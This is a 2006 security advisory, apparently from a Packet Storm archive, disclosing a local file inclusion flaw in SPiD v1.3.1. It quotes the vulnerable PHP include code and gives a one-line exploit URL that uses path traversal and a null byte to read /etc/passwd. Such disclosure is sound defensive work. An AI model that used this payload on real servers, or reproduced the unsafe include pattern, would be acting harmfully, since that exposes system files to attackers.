NSAG-201-25.02.2006.txt

2006-02-26T00:00:00
ID PACKETSTORM:44199
Type packetstorm
Reporter nsag.ru
Modified 2006-02-26T00:00:00

Description

                                        
                                            `Advisory:  
NSAG-¹201-25.02.2006  
  
Research:  
NSA Group [Russian company on Audit of safety & Network security]  
  
Site of Research:  
http://www.nsag.ru or http://www.nsag.org  
  
Product:  
SPiD v1.3.1  
  
  
Site of manufacturer:  
http://spid.adnx.net/  
  
The status:   
19/01/2006 - Publication is postponed.  
14/02/2006 - Answer of the manufacturer is absent.  
25/02/2006 - Publication of vulnerability.  
  
Original Advisory:  
http://www.nsag.ru/vuln/955.html  
  
Risk:   
Hide  
  
Description:   
Attacker can form the query in URL form ang get the access to the  
system files.  
  
Vulnerability code:  
+++++++  
if (isset($_REQUEST["lang"])) {  
$file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php"  
if (file_exists($file_lang)) {  
include $lang_path . "lang.php";  
include $file_lang;  
.....  
skip  
+++++++  
  
Exploit:   
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00  
  
More information:  
http://www.nsag.ru/vuln/955.html  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
www.nsag.ru   
«Nemesis» © 2006   
------------------------------------   
Nemesis Security Audit Group © 2006.  
  
  
`